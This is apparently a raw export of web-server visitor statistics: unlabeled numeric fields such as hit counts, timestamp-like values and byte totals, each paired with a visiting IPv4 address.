1 0 2 29042254 0 29042254 29042254 0 29042254 612 164.92.218.187 5 1 1 0 1 29203777 0 29203777 29203777 0 29203777 612 167.71.69.183 5 0 0 0 8 0 0 29285331 0 0 29285164 0 93.123.109.175 5 0 0 0 1 0 0 29351887 0 0 29351887 0 172.182.215.109 5 1 1 0 0 29305074 0 0 29305074 0 0 1371 64.15.129.118 5 2 2 0 1 29245661 0 29245661 29245661 0 29245661 1224 199.45.155.104 5 1 1 0 0 29305074 0 0 29305074 0 0 1371 64.15.129.115 5 0 0 0 1 0 0 29361164 0 0 29361164 0 80.87.145.1 5 1 1 0 1 28901435 0 28901435 28901435 0 28901435 616 199.45.155.100 5 3 1 0 0 28886583 0 0 28886582 0 0 3299 54.213.151.233 5 1 0 0 0 29021312 0 0 29021312 0 0 87 52.10.108.203 5 0 0 0 2 0 0 29294501 0 0 29294501 0 185.54.231.27 5 1 1 0 0 29211197 0 0 29211197 0 0 612 104.196.206.195 5 1 1 0 0 29286034 0 0 29286034 0 0 610 34.68.49.1 5 1 1 0 0 29198396 0 0 29198396 0 0 612 191.101.217.29 5 1 1 0 1 28998178 0 28998178 28998178 0 28998178 616 138.197.47.143 5 1 1 0 1 28956202 0 28956202 28956202 0 28956202 616 167.94.138.117 5 1 1 0 0 29281086 0 0 29281086 0 0 1263 18.202.77.10 5 0 0 0 1 0 0 29357590 0 0 29357590 0 95.25.59.16 5 1 1 0 1 29116293 0 29116293 29116293 0 29116293 616 174.138.73.8 5 1 1 0 0 29375352 0 0 29375352 0 0 681 136.112.171.27 5 1 0 0 0 28933443 0 0 28933443 0 0 87 16.16.202.94 5 3 3 0 17 29374548 0 29374548 29374548 0 29374548 4113 128.199.76.30 5 0 0 0 2 0 0 29363635 0 0 29363635 0 31.135.230.192 5 1 1 0 1 29324418 0 29324418 29324418 0 29324418 681 146.190.165.104 5 0 0 0 2 0 0 29087845 0 0 29087845 0 35.180.30.87 5 1 1 0 1 29202794 0 29202794 29202794 0 29202794 612 34.38.147.151 5 1 1 0 0 29220102 0 0 29220102 0 0 612 35.229.46.140 5 1 1 0 0 29338467 0 0 29338467 0 0 1371 45.138.16.48 5 0 0 0 1 0 0 29278719 0 0 29278719 0 194.26.192.85 5 1 1 0 0 29211743 0 0 29211743 0 0 612 3.146.99.138 5 0 0 0 1 0 0 29214293 0 0 29214293 0 138.2.235.92 5 1 1 0 11 29069618 0 29069618 29069618 0 29069618 612 3.8.194.88 5 1 1 0 0 29304741 0 0 29304741 0 0 681 217.160.22.61 5 0 0 0 2 0 0 29354781 0 0 29354781 0 91.144.149.55 5 1 1 0 1 29122085 0 29122085 29122085 0 29122085 616 165.232.92.130 5 1 1 0 1 29205480 0 29205480 29205480 0 29205480 612 134.122.47.25 5 1 1 0 11 28997104 0 28997105 28997104 0 28997104 616 13.39.48.73 5 0 0 0 1 0 0 29373955 0 0 29373955 0 45.130.203.137 5 1 1 0 0 29216099 0 0 29216099 0 0 1262 205.210.31.249 5 0 0 0 1 0 0 29328695 0 0 29328695 0 205.210.31.250 5 3 1 0 0 29109309 0 0 28845585 0 0 4221 34.72.176.129 5 0 0 0 1 0 0 29130560 0 0 29130560 0 205.210.31.243 5 0 0 0 1 0 0 29139969 0 0 29139969 0 205.210.31.242 5 1 1 0 0 29214810 0 0 29214810 0 0 1262 205.210.31.240 5 0 0 0 1 0 0 28862702 0 0 28862702 0 205.210.31.237 5 0 0 0 1 0 0 29226101 0 0 29226101 0 194.26.192.53 5 1 0 0 0 29109308 0 0 29109308 0 0 87 18.237.143.136 5 0 0 0 1 0 0 29353668 0 0 29353668 0 5.188.167.226 5 1 1 0 0 29286128 0 0 29286128 0 0 1263 91.231.89.125 5 4 1 0 2 29353290 0 29353290 29353290 0 29353290 4310 34.1.25.28 5 3 3 0 18 29197147 0 29197147 29197147 0 29197147 3136 46.101.111.185 5 1 1 0 2 29084114 0 29084114 29084114 0 29084114 616 167.99.84.249 5 6 4 0 237 29267995 0 29267995 29264880 0 29264880 5123 185.177.72.55 5 1 1 0 0 29287157 0 0 29287157 0 0 0 34.143.202.84 5 3 3 0 18 29255759 0 29255759 29255759 0 29255759 3789 212.102.46.57 5 0 0 0 99 0 0 29333630 0 0 29333629 0 172.192.65.163 5 1 1 0 86 29272325 0 29272326 29272325 0 29272323 610 185.177.72.50 5 1 1 0 2 28943300 0 28943300 28943300 0 28943300 616 164.90.197.60 5 3 1 0 12 29250064 0 29250064 29250064 0 29250064 3369 185.177.72.48 5 1 0 0 0 29285163 0 0 29285163 0 0 87 52.15.117.56 5 0 0 0 1 0 0 28902814 0 0 28902814 0 205.210.31.198 5 0 0 0 189 0 0 29387855 0 0 29387855 0 4.205.254.11 5 0 0 0 5 0 0 29364333 0 0 29364333 0 80.82.55.35 5 4 0 0 0 29203763 0 0 29203759 0 0 5366 179.43.149.114 5 0 0 0 1 0 0 29298746 0 0 29298746 0 205.210.31.194 5 1 1 0 2 28921167 0 28921167 28921167 0 28921167 612 161.35.45.172 5 3 1 0 0 29120884 0 0 29120884 0 0 3295 119.156.228.168 5 0 0 0 1 0 0 29039728 0 0 29039728 0 205.210.31.200 5 1 1 0 0 29373951 0 0 29373951 0 0 681 34.6.20.100 5 0 0 0 1 0 0 29357187 0 0 29357187 0 31.6.108.120 5 1 1 0 1 29285705 0 29285706 29285705 0 29285706 610 213.139.9.170 5 1 1 0 1 29366045 0 29366045 29366045 0 29366045 681 139.59.77.210 5 0 0 0 1 0 0 29049538 0 0 29049538 0 205.210.31.184 5 4 4 0 0 29395825 0 0 29238816 0 0 2217 3.138.185.30 5 0 0 0 1 0 0 29028809 0 0 29028809 0 205.210.31.174 5 2 2 0 0 29368014 0 0 29338986 0 0 2742 45.138.16.228 5 1 1 0 0 29370804 0 0 29370804 0 0 1371 193.0.149.244 5 4 4 0 4 29373003 0 29373003 28845585 0 28845585 2525 57.129.16.41 5 0 0 0 4 0 0 29255841 0 0 29210008 0 103.132.181.180 5 2 2 0 63 29286864 0 29286864 29286864 0 29286864 1220 15.236.19.51 5 1 1 0 0 29219536 0 0 29219536 0 0 1262 205.210.31.155 5 1 1 0 1 29243841 0 29243841 29243841 0 29243841 612 159.203.20.235 5 1 1 0 1 28848470 0 28848470 28848470 0 28848470 616 64.227.187.54 5 3 3 0 17 28933444 0 28933444 28933444 0 28933444 3148 64.227.70.2 5 0 0 0 1 0 0 29308847 0 0 29308847 0 172.182.214.91 5 1 1 0 0 28944158 0 0 28944158 0 0 1266 205.210.31.151 5 2 2 0 0 29297458 0 0 29045562 0 0 2637 205.210.31.147 5 1 1 0 2 29123489 0 29123489 29123489 0 29123489 612 164.92.154.37 5 1 1 0 0 28933446 0 0 28933446 0 0 612 88.99.26.177 5 0 0 0 91 0 0 29385065 0 0 29385065 0 48.210.57.6 5 2 2 0 1 29285705 0 29198396 29198396 0 29198396 1222 51.178.81.195 5 1 1 0 0 28935618 0 0 28935618 0 0 616 207.241.236.83 5 2 2 0 1 29021325 0 29021325 29021325 0 29021325 1232 3.65.189.68 5 2 2 0 1 29246666 0 29246665 29246665 0 29246665 1224 206.168.34.222 5 1 1 0 1 29001222 0 29001222 29001222 0 29001222 616 165.22.116.35 5 1 1 0 0 28906025 0 0 28906025 0 0 1262 205.210.31.136 5 1 1 0 0 29216229 0 0 29216229 0 0 1262 205.210.31.134 5 1 1 0 1 28850520 0 28850520 28850520 0 28850520 616 206.168.34.212 5 2 2 0 1 29079650 0 29079650 29079650 0 29079650 1232 206.168.34.211 5 1 1 0 1 28937697 0 28937697 28937697 0 28937697 616 206.189.129.117 5 1 1 0 1 28862001 0 28862001 28862001 0 28862001 616 206.168.34.207 5 1 1 0 0 29410417 0 0 29410417 0 0 314 185.247.137.78 5 0 0 0 158 0 0 29398488 0 0 29398488 0 52.169.206.229 5 1 1 0 0 29322199 0 0 29322199 0 0 1371 147.185.132.246 5 1 0 0 0 29197145 0 0 29197145 0 0 87 47.129.199.154 5 1 1 0 1 29365155 0 29365155 29365155 0 29365155 681 167.99.13.228 5 1 1 0 1 29222673 0 29222673 29222673 0 29222673 612 144.126.215.108 5 1 1 0 0 29200058 0 0 29200058 0 0 612 185.247.137.66 5 0 0 0 2 0 0 29021653 0 0 29021653 0 167.71.222.167 5 0 0 0 1 0 0 28939685 0 0 28939685 0 147.185.132.225 5 0 0 0 1 0 0 29039410 0 0 29039410 0 205.210.31.102 5 2 1 0 0 28854038 0 0 28854031 0 0 2937 44.220.151.139 5 3 3 0 18 29373514 0 29373515 29373514 0 29373514 4113 161.35.61.42 5 2 2 0 0 29273719 0 0 29273719 0 0 1263 104.168.40.149 5 0 0 0 1 0 0 29190672 0 0 29190672 0 111.126.208.125 5 0 0 0 1 0 0 29347367 0 0 29347367 0 5.188.9.122 5 1 1 0 2 29024338 0 29024338 29024338 0 29024338 616 64.227.129.10 5 3 3 0 18 29219131 0 29219131 29219131 0 29219131 3786 3.145.102.1 5 3 1 0 3 29261510 0 29261510 29261510 0 29261510 3069 34.1.23.128 5 1 1 0 2 29002715 0 29002715 29002715 0 29002715 612 164.90.161.120 5 20 8 4 23 29250912 29250912 29250913 29250910 29250911 29250911 62304 20.171.207.19 5 0 0 0 1 0 0 29141406 0 0 29141406 0 147.185.132.192 5 1 1 0 1 29385344 0 29385344 29385344 0 29385344 314 142.93.98.38 5 1 1 0 2 29144602 0 29144602 29144602 0 29144602 616 143.110.181.24 5 1 1 0 1 29199714 0 29199714 29199714 0 29199714 612 165.232.177.113 5 3 3 0 18 29285163 0 29285163 29285163 0 29285163 3136 64.226.78.121 5 1 0 0 0 29109308 0 0 29109308 0 0 87 18.143.141.42 5 1 1 0 2 29164100 0 29164100 29164100 0 29164100 612 67.205.175.99 5 1 1 0 0 29353693 0 0 29353693 0 0 681 185.247.137.11 5 0 0 0 1 0 0 29190077 0 0 29190077 0 156.59.29.231 5 2 2 1 2 29405694 29405694 29405694 29405694 29405694 29405694 628 206.168.34.121 5 0 0 0 1 0 0 29033641 0 0 29033641 0 147.185.132.162 5 0 0 0 1 0 0 29369021 0 0 29369021 0 74.7.230.37 5 3 3 0 18 29295159 0 29295159 29295159 0 29295159 4113 13.215.252.102 5 3 1 0 0 28858800 0 0 28858800 0 0 3299 54.245.195.111 5 2 2 0 2 29113521 0 29113521 29113465 0 29113465 1232 64.23.241.140 5 1 0 0 0 29197145 0 0 29197145 0 0 87 16.16.206.28 5 0 0 0 1 0 0 29373029 0 0 29373029 0 91.196.152.228 5 0 0 0 116 0 0 29356079 0 0 29356078 0 4.217.182.140 5 0 0 0 1 0 0 29134555 0 0 29134555 0 147.185.132.150 5 3 1 0 0 29114830 0 0 29114830 0 0 3295 177.222.239.46 5 0 0 0 3 0 0 29372913 0 0 29372913 0 93.170.127.95 5 2 2 0 1 29148692 0 29148692 29148692 0 29148692 1232 206.168.34.77 5 1 1 0 0 29190970 0 0 29190970 0 0 612 111.7.100.27 5 1 1 0 0 29190970 0 0 29190970 0 0 612 111.7.100.26 5 1 1 0 0 29352433 0 0 29352433 0 0 681 101.78.165.58 5 4 1 0 2 29353807 0 29353807 29353807 0 29353807 4310 34.1.17.118 5 0 0 0 1 0 0 29388621 0 0 29388621 0 74.7.230.18 5 0 0 0 5 0 0 29358295 0 0 29358295 0 185.218.108.135 5 1 1 0 2 29164562 0 29164562 29164562 0 29164562 616 68.183.120.167 5 1 1 0 0 28930707 0 0 28930707 0 0 1266 3.249.42.189 5 1 0 0 0 29050910 0 0 29050910 0 0 362 3.16.114.2 5 1 0 0 0 28933443 0 0 28933443 0 0 87 3.22.63.243 5 0 0 0 144 0 0 29356548 0 0 29356548 0 13.73.16.209 5 0 0 0 1 0 0 29373309 0 0 29373309 0 64.226.115.81 5 2 2 0 1 29089529 0 29089529 29089529 0 29089529 1232 206.168.34.51 5 2 2 0 1 29287973 0 29287972 29287972 0 29287972 1220 206.168.34.45 5 0 0 0 1 0 0 28932553 0 0 28932553 0 147.185.132.114 5 1 1 0 1 28853194 0 28853194 28853194 0 28853194 616 206.168.34.43 5 8 2 0 0 29021468 0 0 29021468 0 0 8064 205.169.39.216 5 1 1 0 1 28871456 0 28871456 28871456 0 28871456 616 68.183.6.217 5 0 0 0 1 0 0 28908606 0 0 28908606 0 147.185.132.108 5 2 2 0 0 29391322 0 0 29391322 0 0 628 205.169.39.213 5 6 6 0 0 29407558 0 0 29198395 0 0 3441 3.146.111.124 5 0 0 0 1 0 0 29363935 0 0 29363935 0 212.59.106.128 5 1 1 0 2 28982361 0 28982361 28982361 0 28982361 612 167.99.213.174 5 1 1 0 1 29306355 0 29306355 29306355 0 29306355 681 165.232.74.75 5 2 2 0 0 29119337 0 0 29110573 0 0 1232 107.174.224.18 5 12 12 0 0 29345761 0 0 29302562 0 0 6810 3.222.165.167 5 0 0 0 1 0 0 29198614 0 0 29198614 0 91.196.152.160 5 8 2 0 0 28933550 0 0 28933550 0 0 8064 205.169.39.184 5 0 0 0 2 0 0 29109070 0 0 29109070 0 15.237.216.54 5 1 1 0 0 29286217 0 0 29286217 0 0 610 34.58.6.143 5 3 3 0 18 29129640 0 29129640 29129640 0 29129640 3786 165.232.149.232 5 0 0 0 1 0 0 29190672 0 0 29190672 0 123.12.59.239 5 0 0 0 1 0 0 29350491 0 0 29350491 0 64.23.172.83 5 1 1 0 1 29264008 0 29264008 29264008 0 29264008 610 139.59.44.234 5 1 1 0 0 29148213 0 0 29148213 0 0 1266 54.77.253.2 5 1 1 0 2 29183317 0 29183317 29183317 0 29183317 612 159.89.49.85 5 1 0 0 0 28845583 0 0 28845583 0 0 87 16.16.146.1 5 3 3 0 18 29248478 0 29248478 29248478 0 29248478 3786 54.81.84.253 5 8 2 0 0 28846656 0 0 28846656 0 0 8056 205.169.39.161 5 1 1 0 1 29345111 0 29345111 29345111 0 29345111 681 159.203.110.104 5 3 3 0 18 29143365 0 29143365 29143365 0 29143365 3786 34.219.177.233 5 1 1 0 0 29289322 0 0 29289322 0 0 610 34.138.204.167 5 1 1 0 0 29190672 0 0 29190672 0 0 612 222.139.40.250 5 0 0 0 1 0 0 29275441 0 0 29275441 0 54.250.45.247 5 1 1 0 2 28882316 0 28882316 28882316 0 28882316 616 159.89.174.232 5 1 1 0 2 29024422 0 29024422 29024422 0 29024422 616 142.93.12.181 5 2 2 0 1 29352769 0 29352768 29352768 0 29352768 1362 199.45.155.79 5 1 1 0 2 29102613 0 29102613 29102613 0 29102613 612 209.97.181.198 5 2 0 0 0 29109308 0 0 28933443 0 0 174 23.178.112.217 5 2 2 0 1 29138356 0 29138356 29138356 0 29138356 1232 199.45.155.75 5 2 2 0 1 29141575 0 29141575 29141575 0 29141575 1232 199.45.155.74 5 1 0 0 0 29021312 0 0 29021312 0 0 87 23.178.112.215 5 2 2 0 1 29229988 0 29229988 29229988 0 29229988 1224 199.45.155.73 5 1 0 0 0 29285163 0 0 29285163 0 0 87 23.178.112.213 5 1 0 0 0 28845583 0 0 28845583 0 0 87 23.178.112.210 5 1 1 0 2 29142970 0 29142970 29142970 0 29142970 612 143.198.57.212 5 0 0 0 2 0 0 29131679 0 0 29131679 0 143.198.208.55 5 1 1 0 0 29366494 0 0 29366494 0 0 1371 109.252.114.24 5 1 1 0 1 29406443 0 29406443 29406443 0 29406443 314 159.89.225.110 5 8 2 0 0 29109309 0 0 29109309 0 0 8064 205.169.39.116 5 8 2 0 0 28845586 0 0 28845586 0 0 8064 205.169.39.114 5 1 1 0 2 29022342 0 29022342 29022342 0 29022342 612 167.71.129.123 5 0 0 0 1 0 0 29176024 0 0 29176024 0 27.115.124.97 5 1 1 0 2 29155772 0 29155772 29155772 0 29155772 616 185.93.89.50 5 0 0 0 1 0 0 29361663 0 0 29361663 0 85.175.199.119 5 1 1 0 1 28995251 0 28995251 28995251 0 28995251 616 104.131.89.165 5 1 1 0 1 28854943 0 28854943 28854943 0 28854943 616 167.94.145.97 5 1 0 0 0 28933443 0 0 28933443 0 0 87 54.218.54.241 5 0 0 0 1 0 0 28943238 0 0 28943238 0 147.185.132.54 5 0 0 0 1 0 0 29363929 0 0 29363929 0 5.18.190.160 5 1 0 0 2 29176024 0 29176024 29176024 0 29176024 362 27.115.124.70 5 2 2 0 1 29156345 0 29156345 29156345 0 29156345 1232 199.45.154.143 5 0 0 0 2 0 0 29047517 0 0 29047517 0 18.170.33.114 5 2 2 0 63 29289528 0 29289528 29289527 0 29289527 1220 13.201.48.2 5 1 1 0 11 29171761 0 29171762 29171761 0 29171761 612 13.39.50.34 5 3 3 0 18 29210962 0 29210962 29210962 0 29210962 3786 54.172.28.248 5 0 0 0 1 0 0 28949241 0 0 28949241 0 147.185.132.45 5 1 1 0 0 29268969 0 0 29268969 0 0 610 185.197.195.89 5 17 1 0 82 29382352 0 29381387 28845583 0 29381386 1338 194.87.217.15 5 3 3 0 0 29350469 0 0 29301262 0 0 2043 3.140.182.19 5 1 1 0 1 28847576 0 28847576 28847576 0 28847576 616 199.45.154.133 5 1 0 0 0 29373003 0 0 29373003 0 0 87 18.143.176.94 5 0 0 0 1 0 0 29371907 0 0 29371907 0 146.19.27.141 5 3 3 0 18 29163138 0 29163138 29163138 0 29163138 3786 85.204.70.100 5 3 3 0 18 29102676 0 29102676 29102676 0 29102676 3786 213.166.86.90 5 1 0 0 0 29197145 0 0 29197145 0 0 87 52.14.210.163 5 0 0 0 3 0 0 29176024 0 0 29176024 0 27.115.124.53 5 1 1 0 0 29373951 0 0 29373951 0 0 681 54.187.96.240 5 0 0 0 2 0 0 29111571 0 0 29111571 0 31.56.56.147 5 0 0 0 6 0 0 29228734 0 0 29228317 0 45.141.215.193 5 1 1 0 2 29062999 0 29062999 29062999 0 29062999 612 137.184.136.154 5 8 3 0 3 29176024 0 29176025 29176024 0 29176024 6415 27.115.124.45 5 0 0 0 195 0 0 29383755 0 0 29366227 0 52.178.223.71 5 0 0 0 10 0 0 29116976 0 0 29116976 0 154.83.103.210 5 0 0 0 1 0 0 28933788 0 0 28933788 0 147.185.132.21 5 2 0 0 1 29176024 0 29176024 29176024 0 29176024 2727 27.115.124.38 5 2 2 0 0 29352092 0 0 29300946 0 0 1362 44.193.254.10 5 1 1 0 1 29222250 0 29160301 29222250 0 29160301 1262 147.185.132.18 5 0 0 0 1 0 0 29413991 0 0 29413991 0 91.224.92.198 5 0 0 0 1 0 0 29358875 0 0 29358875 0 4.227.36.69 5 0 0 0 4 0 0 29027228 0 0 28935749 0 45.148.10.86 5 0 0 0 137 0 0 29378026 0 0 29378026 0 20.37.96.143 5 1 1 0 0 29142197 0 0 29142197 0 0 616 185.247.137.253 5 0 0 0 1 0 0 29116640 0 0 29116640 0 74.178.89.29 5 1 1 0 0 29190672 0 0 29190672 0 0 612 116.21.128.216 5 2 0 0 0 29261459 0 0 29257177 0 0 4642 45.148.10.80 5 0 0 0 11 0 0 28896692 0 0 28896692 0 179.43.189.138 5 1 0 0 0 29197145 0 0 29197145 0 0 87 23.178.112.104 5 1 0 0 0 29373003 0 0 29373003 0 0 87 23.178.112.103 5 39 11 13 22 29250912 29250912 29250913 29250910 29250910 29250910 376443 20.171.207.100 5 0 0 0 1 0 0 29198403 0 0 29198403 0 178.20.55.16 5 1 1 0 0 29159531 0 0 29159531 0 0 616 135.148.55.164 5 14 3 0 0 29176024 0 0 29176024 0 0 14597 27.115.124.109 5 3 1 0 0 28849501 0 0 28849501 0 0 3299 54.202.183.123 5 2 0 0 2 29176024 0 29176025 29176024 0 29176024 2727 27.115.124.6 5 1 1 0 1 29292009 0 29292009 29292009 0 29292009 610 45.55.90.178 5 1 1 0 0 29036746 0 0 29036746 0 0 616 185.247.137.239 5 2 2 0 0 28845977 0 0 28845977 0 0 2532 192.175.111.250 5 3 0 0 3 29176024 0 29176025 29176024 0 29176024 3089 27.115.124.101 5 1 1 0 1 29373247 0 29373247 29373247 0 29373247 681 34.142.129.246 5 0 0 0 1 0 0 28845977 0 0 28845977 0 192.175.111.243 5 1 1 0 0 28845977 0 0 28845977 0 0 1266 192.175.111.239 5 1 1 0 0 29246326 0 0 29246326 0 0 612 185.247.137.228 5 0 0 0 80 0 0 29375823 0 0 29375823 0 172.202.39.184 5 0 0 0 2 0 0 28936238 0 0 28936238 0 174.138.19.131 5 1 1 0 0 28845977 0 0 28845977 0 0 1266 192.175.111.233 5 0 0 0 1 0 0 29305074 0 0 29305074 0 192.175.111.232 5 1 1 0 0 29305074 0 0 29305074 0 0 1371 192.175.111.230 5 0 0 0 1 0 0 29363935 0 0 29363935 0 93.95.138.233 5 1 1 0 2 28923028 0 28923028 28923028 0 28923028 616 147.182.129.195 5 1 1 0 1 28862331 0 28862331 28862331 0 28862331 616 161.35.80.206 5 1 1 0 2 28903034 0 28903034 28903034 0 28903034 616 159.89.112.81 5 0 0 0 1 0 0 29250910 0 0 29250910 0 4.227.36.13 5 1 1 0 0 29346541 0 0 29346541 0 0 1371 198.235.24.253 5 1 1 0 0 28887713 0 0 28887713 0 0 1266 54.76.50.177 5 1 1 0 0 29175880 0 0 29175880 0 0 612 95.182.100.70 5 0 0 0 2 0 0 29198267 0 0 29198267 0 128.199.77.193 5 0 0 0 1 0 0 29043165 0 0 29043165 0 198.235.24.245 5 0 0 0 1 0 0 29146878 0 0 29146878 0 45.32.52.232 5 2 1 0 0 29118511 0 0 29118510 0 0 974 176.98.186.51 5 0 0 0 134 0 0 29346559 0 0 29346558 0 20.243.65.50 5 0 0 0 1 0 0 28933446 0 0 28933446 0 159.223.47.1 5 0 0 0 1 0 0 28857731 0 0 28857731 0 198.235.24.242 5 1 1 0 0 29021315 0 0 29021315 0 0 616 207.241.225.134 5 1 1 0 0 29023052 0 0 29023052 0 0 1266 188.165.87.103 5 1 1 0 0 29198396 0 0 29198396 0 0 612 146.70.221.26 5 1 1 0 0 29295503 0 0 29295503 0 0 1371 198.235.24.237 5 0 0 0 1 0 0 29366930 0 0 29366930 0 216.81.245.142 5 4 4 0 62 29126054 0 29126054 29126052 0 29126052 3786 64.227.151.214 5 1 1 0 0 29285705 0 0 29285705 0 0 610 146.70.221.22 5 0 0 0 1 0 0 29145107 0 0 29145107 0 198.235.24.232 5 0 0 0 43 0 0 29211744 0 0 29211738 0 156.59.62.150 5 1 1 0 0 29198571 0 0 29198571 0 0 612 35.186.162.22 5 0 0 0 2 0 0 29358846 0 0 29358846 0 5.164.12.62 5 0 0 0 1 0 0 29190672 0 0 29190672 0 1.194.133.255 5 1 1 0 1 29327331 0 29029546 29327331 0 29029546 1371 198.235.24.224 5 1 1 0 0 29065755 0 0 29065755 0 0 1266 34.247.56.161 5 0 0 0 1 0 0 29307878 0 0 29307878 0 172.182.215.19 5 3 3 0 18 29199731 0 29199731 29199731 0 29199731 3786 54.163.83.104 5 0 0 0 1 0 0 29126128 0 0 29126128 0 198.235.24.215 5 1 1 0 0 29302886 0 0 29302886 0 0 1371 198.235.24.214 5 0 0 0 1 0 0 29180843 0 0 29180843 0 103.129.214.43 5 1 1 0 2 29082634 0 29082634 29082634 0 29082634 612 157.245.129.73 5 0 0 0 2 0 0 29248849 0 0 29248849 0 34.142.165.128 5 6 2 0 0 29116749 0 0 29116463 0 0 6594 179.43.145.98 5 1 0 0 0 28845584 0 0 28845584 0 0 87 18.223.133.47 5 3 1 0 0 29116906 0 0 29116906 0 0 3299 18.143.163.221 5 2 2 0 1 29364224 0 29364224 29364224 0 29364224 1362 162.142.125.212 5 0 0 0 3 0 0 29358879 0 0 29358879 0 46.138.224.248 5 2 2 1 0 29384652 29384652 0 29384652 29384652 0 628 162.142.125.199 5 1 1 0 1 28892165 0 28892165 28892165 0 28892165 616 162.142.125.197 5 1 1 0 0 29166244 0 0 29166244 0 0 1262 198.235.24.186 5 2 2 0 1 29134213 0 29134212 29134212 0 29134212 1232 162.142.125.193 5 1 1 0 0 29222249 0 0 29222249 0 0 1262 198.235.24.182 5 1 1 0 2 29015105 0 29015106 29015105 0 29015105 616 162.142.125.201 5 1 1 0 1 28946654 0 28946654 28946654 0 28946654 616 162.142.125.200 5 1 1 0 1 29225804 0 29225804 29225804 0 29225804 612 159.89.177.12 5 1 1 0 0 29285705 0 0 29285705 0 0 610 34.221.166.72 5 1 0 0 0 29021312 0 0 29021312 0 0 87 16.171.249.207 5 1 1 0 0 29288717 0 0 29288717 0 0 1263 198.235.24.176 5 3 1 0 3 29265016 0 29265016 29265016 0 29265016 3069 35.211.215.109 5 1 1 0 0 29219620 0 0 29219620 0 0 612 35.230.8.80 5 0 0 0 1 0 0 28851879 0 0 28851879 0 198.235.24.171 5 0 0 0 1 0 0 29364336 0 0 29364336 0 89.107.11.49 5 1 0 0 0 29109308 0 0 29109308 0 0 87 16.16.77.121 5 1 1 0 0 29226461 0 0 29226461 0 0 1262 198.235.24.166 5 3 1 0 3 29329343 0 29329343 29329343 0 29329343 3140 34.1.31.19 5 0 0 0 217 0 0 29408500 0 0 29408500 0 4.206.90.251 5 1 1 0 0 29137985 0 0 29137985 0 0 1266 198.235.24.163 5 0 0 0 2 0 0 29347753 0 0 29347753 0 80.249.179.225 5 1 1 0 0 28935621 0 0 28935621 0 0 1266 198.235.24.159 5 0 0 0 1 0 0 28950429 0 0 28950429 0 198.235.24.158 5 4 1 0 2 29354643 0 29354643 29354643 0 29354643 4310 34.1.27.164 5 1 1 0 0 28891469 0 0 28891469 0 0 616 35.223.51.239 5 1 1 0 1 29029853 0 29029853 29029853 0 29029853 616 206.189.99.52 5 3 3 0 15 28845585 0 28845585 28845585 0 28845585 3148 138.68.82.23 5 1 1 0 0 29046038 0 0 29046038 0 0 616 35.187.250.253 5 1 1 0 0 29241639 0 0 29241639 0 0 612 3.239.168.98 5 1 1 0 1 28865692 0 28865692 28865692 0 28865692 616 138.197.176.55 5 1 1 0 0 29256534 0 0 29256534 0 0 610 3.237.81.201 5 0 0 0 1 0 0 28954438 0 0 28954438 0 198.235.24.142 5 0 0 0 4 0 0 29180810 0 0 29180752 0 167.179.87.227 5 3 3 0 18 29109309 0 29109309 29109309 0 29109309 3148 164.90.228.79 5 1 1 0 0 28864803 0 0 28864803 0 0 1266 198.235.24.135 5 1 1 0 0 28954040 0 0 28954040 0 0 1262 198.235.24.134 5 0 0 0 2 0 0 28847167 0 0 28847167 0 167.172.73.68 5 1 1 0 0 29356553 0 0 29356553 0 0 681 98.94.69.19 5 0 0 0 1 0 0 29230611 0 0 29230611 0 172.182.204.72 5 1 1 0 0 29207724 0 0 29207724 0 0 1262 198.235.24.6 5 1 1 0 2 29004220 0 29004220 29004220 0 29004220 616 174.138.8.6 5 0 0 0 8 0 0 29372535 0 0 29372535 0 188.0.179.29 5 0 0 0 1 0 0 29296520 0 0 29296520 0 45.154.98.45 5 1 1 0 1 29285569 0 29285569 29285569 0 29285569 610 34.143.190.22 5 0 0 0 1 0 0 29166470 0 0 29166470 0 198.235.24.119 5 1 1 0 0 29397159 0 0 29397159 0 0 314 35.170.13.97 5 1 1 0 0 29351068 0 0 29351068 0 0 681 34.86.129.155 5 1 1 0 1 28934786 0 28934786 28934786 0 28934786 616 161.35.4.38 5 1 1 0 0 29373024 0 0 29373024 0 0 1371 198.235.24.112 5 0 0 0 3 0 0 29342550 0 0 29342550 0 52.179.139.10 5 12 3 0 0 29373004 0 0 28846656 0 0 15748 34.122.147.229 5 0 0 0 1 0 0 29033703 0 0 29033703 0 198.235.24.110 5 3 3 0 0 29129658 0 0 29110957 0 0 1848 172.245.241.123 5 3 1 0 0 29144318 0 0 29126076 0 0 3075 170.39.218.60 5 3 3 0 18 29350184 0 29350184 29350184 0 29350184 4113 209.38.156.9 5 0 0 0 1 0 0 28863962 0 0 28863962 0 198.235.24.100 5 2 2 0 1 29232280 0 29232280 29232280 0 29232280 1224 167.94.145.105 5 0 0 0 1 0 0 29287566 0 0 29287566 0 193.233.75.252 5 1 1 0 1 28860416 0 28860416 28860416 0 28860416 616 167.94.145.101 5 0 0 0 1 0 0 29263273 0 0 29263273 0 196.251.86.207 5 0 0 0 2 0 0 29248802 0 0 29248802 0 34.143.241.214 5 1 1 0 0 29198605 0 0 29198605 0 0 1262 91.231.89.39 5 1 1 0 1 28900278 0 28900278 28900278 0 28900278 612 44.234.121.151 5 3 1 0 0 29024120 0 0 29024120 0 0 3299 54.82.36.34 5 1 0 0 0 29021312 0 0 29021312 0 0 87 3.14.84.241 5 1 1 0 0 29325451 0 0 29325451 0 0 1371 198.235.24.96 5 1 1 0 2 28901235 0 28901235 28901235 0 28901235 612 167.172.174.122 5 1 0 0 0 29285163 0 0 29285163 0 0 87 47.129.101.80 5 0 0 0 5 0 0 29357574 0 0 29357574 0 5.139.227.153 5 0 0 0 1 0 0 29363635 0 0 29363635 0 31.135.226.58 5 0 0 0 1 0 0 29116330 0 0 29116330 0 74.234.26.25 5 1 1 0 0 29210341 0 0 29210341 0 0 1262 198.235.24.87 5 0 0 0 1 0 0 28940276 0 0 28940276 0 198.235.24.84 5 1 0 0 0 28933444 0 0 28933444 0 0 362 205.169.39.55 5 1 1 0 0 29373021 0 0 29373021 0 0 1371 91.231.89.20 5 1 1 0 0 29356989 0 0 29356989 0 0 681 52.54.227.142 5 0 0 0 1 0 0 29348829 0 0 29348829 0 198.235.24.80 5 1 0 0 0 29373003 0 0 29373003 0 0 87 13.48.67.219 5 3 3 0 18 29268481 0 29268481 29268481 0 29268481 3789 34.26.68.237 5 1 1 0 1 29026983 0 29026983 29026983 0 29026983 616 165.232.93.169 5 0 0 0 144 0 0 29360412 0 0 29360411 0 74.176.186.150 5 5 1 0 0 28933961 0 0 28933961 0 0 4989 205.169.39.47 5 2 2 0 0 29273719 0 0 29273719 0 0 1263 50.118.248.143 5 2 2 0 156 29282790 0 29282790 29282790 0 29282790 1220 185.177.72.7 5 1 1 0 0 29382353 0 0 29382353 0 0 314 205.169.39.44 5 